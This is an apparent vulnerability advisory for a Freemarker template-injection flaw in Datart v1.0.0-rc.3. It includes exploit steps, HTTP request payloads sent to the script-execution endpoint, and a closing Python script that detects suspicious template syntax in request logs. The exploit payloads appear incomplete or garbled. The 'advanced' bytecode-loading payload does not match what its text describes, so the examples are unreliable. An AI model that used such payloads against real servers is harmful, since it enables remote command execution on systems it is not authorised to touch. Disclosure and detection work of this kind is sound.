### Vulnerability Overview

- **CVE ID:** CVE-2025-70830
- **Affected Product:** Datart
- **Affected Version:** v1.0.0-rc.3
- **Vulnerability Type:** Server-Side Template Injection (SSTI)
- **Severity Level:** Remote Code Execution (RCE)

### Vulnerability Description

The Freemarker template engine in Datart version v1.0.0-rc.3 is vulnerable to Server-Side Template Injection (SSTI). An authenticated attacker can inject malicious Freemarker template syntax into the SQL script field to execute arbitrary system commands on the server.

### Proof of Concept

#### 1. Prerequisites

- Log in to the Datart system.
- Open and edit a data source that supports SQL execution.

#### 2. Payload Construction

In the SQL script/query editor, enter the following Freemarker payload to trigger system command execution (e.g., `id` or `calc`):

```freemarker
${pb.start()}
SELECT 1
```

Click "Execute Script" to trigger the command execution on the server.

#### 3. HTTP Request Example

The following API request triggers the vulnerability:

```http
POST /api/v1/data-provider/execute/test HTTP/1.1
Host: target.com:8080
Content-Type: application/json
Authorization: Bearer {VALID_TOKEN}

{
  "sourceId": "valid_source_id",
  "script": "${pb.start()}SELECT 1",
  "scriptType": "SQL",
  "size": 100
}
```

### Advanced Exploitation

**Load Arbitrary Bytecode**

Attackers can leverage Java's `javax.script.ScriptEngineManager` to invoke the JavaScript engine and load and execute arbitrary Base64-encoded Java bytecode.

**Payload Example:**

```http
POST /api/v1/data-provider/execute/test HTTP/1.1
Host: target.com:8080
Content-Type: application/json
Authorization: Bearer {VALID_TOKEN}

{
  "script": "({Binding: GlobalObject})>()",
  "sourceId": "valid_source_id",
  "size": 1000,
  "scriptType": "SQL",
  "columns": "",
  "variables": []
}
```
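For defenders reviewing submissions to the `/api/v1/data-provider/execute/test` endpoint above, the following added example (not Datart's code) parses one JSON request record per line and reports `script` values that carry Freemarker constructs beyond a plain `${variable}` reference, such as the `${pb.start()}` payload or any `<#` directive. The record layout (`path` plus `body`) and the sample lines are constructed assumptions for this example.

```python
import json
import re

# Freemarker interpolation ${expr}; a bare variable name is tolerated,
# anything else (method calls, built-ins, navigation) is reported.
INTERPOLATION = re.compile(r"\$\{([^}]*)\}")
SIMPLE_VARIABLE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
# Directive and legacy-interpolation markers that never belong in a SQL script.
DIRECTIVE = re.compile(r"<#|\[#|<@|\[@|#\{")
EXECUTE_ENDPOINT = "/api/v1/data-provider/execute/test"


def classify_interpolations(script):
    """Return the Freemarker constructs in `script` that warrant review."""
    findings = []
    for match in INTERPOLATION.finditer(script):
        expr = match.group(1).strip()
        if not SIMPLE_VARIABLE.fullmatch(expr):
            findings.append(expr)
    # An opening "${" without a closing brace is still template syntax.
    if script.count("${") > len(INTERPOLATION.findall(script)):
        findings.append("unterminated ${")
    findings.extend(m.group(0) for m in DIRECTIVE.finditer(script))
    return findings


def flag_requests(log_lines):
    """Parse one JSON record per line and report suspicious script submissions."""
    flagged = []
    for line in log_lines:
        record = json.loads(line)
        if record.get("path") != EXECUTE_ENDPOINT:
            continue
        body = record.get("body", {})
        findings = classify_interpolations(body.get("script", ""))
        if findings:
            flagged.append({"sourceId": body.get("sourceId"), "findings": findings})
    return flagged


# Constructed sample records (request path plus JSON body), not real traffic.
SAMPLE_LINES = [json.dumps(r) for r in [
    {"path": EXECUTE_ENDPOINT, "body": {"sourceId": "src-1", "script": "SELECT 1", "scriptType": "SQL"}},
    {"path": EXECUTE_ENDPOINT, "body": {"sourceId": "src-2", "script": "SELECT * FROM sales WHERE region = '${region}'", "scriptType": "SQL"}},
    {"path": EXECUTE_ENDPOINT, "body": {"sourceId": "src-3", "script": "${pb.start()}SELECT 1", "scriptType": "SQL"}},
    {"path": EXECUTE_ENDPOINT, "body": {"sourceId": "src-4", "script": "<#assign x = 1>SELECT 1", "scriptType": "SQL"}},
    {"path": "/api/v1/sources", "body": {"sourceId": "src-5", "script": "${pb.start()}"}},
]]

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_LINES):
        print(hit)
```

Deployments that intentionally pass template variables into SQL scripts should extend `SIMPLE_VARIABLE` to an explicit allow-list of expected names rather than accepting any identifier.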